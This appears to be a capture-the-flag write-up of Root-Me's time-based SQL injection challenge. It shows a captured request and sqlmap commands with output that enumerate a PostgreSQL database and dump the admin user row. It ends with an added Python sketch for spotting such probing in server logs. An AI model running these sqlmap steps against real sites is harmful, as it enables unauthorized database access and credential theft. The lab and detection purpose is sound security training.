SQL injection: time-based

Root-Me challenge "SQL injection - Time based": retrieve the administrator's password.


members.txt:

GET /web-serveur/ch40/?action=member&member=1* HTTP/1.1
Host: challenge01.root-me.org
...
Upgrade-Insecure-Requests: 1
Databases:

sqlmap -r members.txt --risk=3 --level=5 --batch --dbs

URI parameter '#1*' is vulnerable.
the back-end DBMS is PostgreSQL
available databases [1]:
[*] public

Tables:

sqlmap -r members.txt --risk=3 --level=1 --batch --dbs -D public --tables

Database: public
[1 table]
+-------+
| users |
+-------+

Dump:

sqlmap -r members.txt --risk=3 --level=1 --batch --dbs -D public --dump

+----+---------------------------+----------+---------------+----------+-----------+
| id | email                     | lastname | password      | username | firstname |
+----+---------------------------+----------+---------------+----------+-----------+
| 1  | ycam@sqlitimebased.com    | MAC      | xxxxxxxxxxxxx | admin    | Yann      |
+----+---------------------------+----------+---------------+----------+-----------+
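Seen from the server side, a scan like the one above leaves a trail on the `member` parameter: many non-integer values from one client, some of them answered only after a delay. The following detection sketch is an added example, not part of the original write-up; the log format, thresholds, function names and client addresses are assumptions, and the sample lines are constructed with injected conditions replaced by the placeholder `<cond>`.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumed log format: client IP, quoted request line, status, response time in seconds.
LINE = re.compile(r'(\S+) "GET (\S+) HTTP/1\.1" (\d{3}) (\d+\.\d+)$')

# Constructed sample log. Injected conditions are replaced by the placeholder <cond>.
SAMPLE_LOG = """\
203.0.113.7 "GET /web-serveur/ch40/?action=member&member=1 HTTP/1.1" 200 0.041
203.0.113.7 "GET /web-serveur/ch40/?action=member&member=3 HTTP/1.1" 200 3.412
192.0.2.44 "GET /web-serveur/ch40/?action=member&member=1a HTTP/1.1" 200 0.039
198.51.100.9 "GET /web-serveur/ch40/?action=member&member=1%20AND%20<cond> HTTP/1.1" 200 0.040
198.51.100.9 "GET /web-serveur/ch40/?action=member&member=1%20AND%20<cond> HTTP/1.1" 200 5.043
198.51.100.9 "GET /web-serveur/ch40/?action=member&member=1%20AND%20<cond> HTTP/1.1" 200 0.037
198.51.100.9 "GET /web-serveur/ch40/?action=member&member=1%20AND%20<cond> HTTP/1.1" 200 5.051
198.51.100.9 "GET /web-serveur/ch40/?action=member&member=1%20AND%20<cond> HTTP/1.1" 200 5.048
"""

def member_probe_stats(log_text, slow_secs=3.0):
    """Per client: requests whose `member` is not a plain integer, and how many were slow."""
    stats = defaultdict(lambda: {"tampered": 0, "slow": 0})
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # line does not follow the assumed format
        ip, uri, _status, secs = m.groups()
        query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
        if query.get("action") != ["member"]:
            continue
        # A legitimate member id is ASCII digits only; repeated parameters are checked too.
        if all(re.fullmatch(r"[0-9]+", v) for v in query.get("member", [])):
            continue
        stats[ip]["tampered"] += 1
        if float(secs) >= slow_secs:
            stats[ip]["slow"] += 1
    return dict(stats)

def flag_clients(stats, min_tampered=3, min_slow=2):
    """Clients that both tamper with `member` repeatedly and trigger delayed responses."""
    return sorted(ip for ip, s in stats.items()
                  if s["tampered"] >= min_tampered and s["slow"] >= min_slow)

if __name__ == "__main__":
    print(flag_clients(member_probe_stats(SAMPLE_LOG)))
```

A slow response to a well-formed id (the second sample line) and a single malformed value (the third) are deliberately not flagged; only the combination of repeated tampering and repeated delays is.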
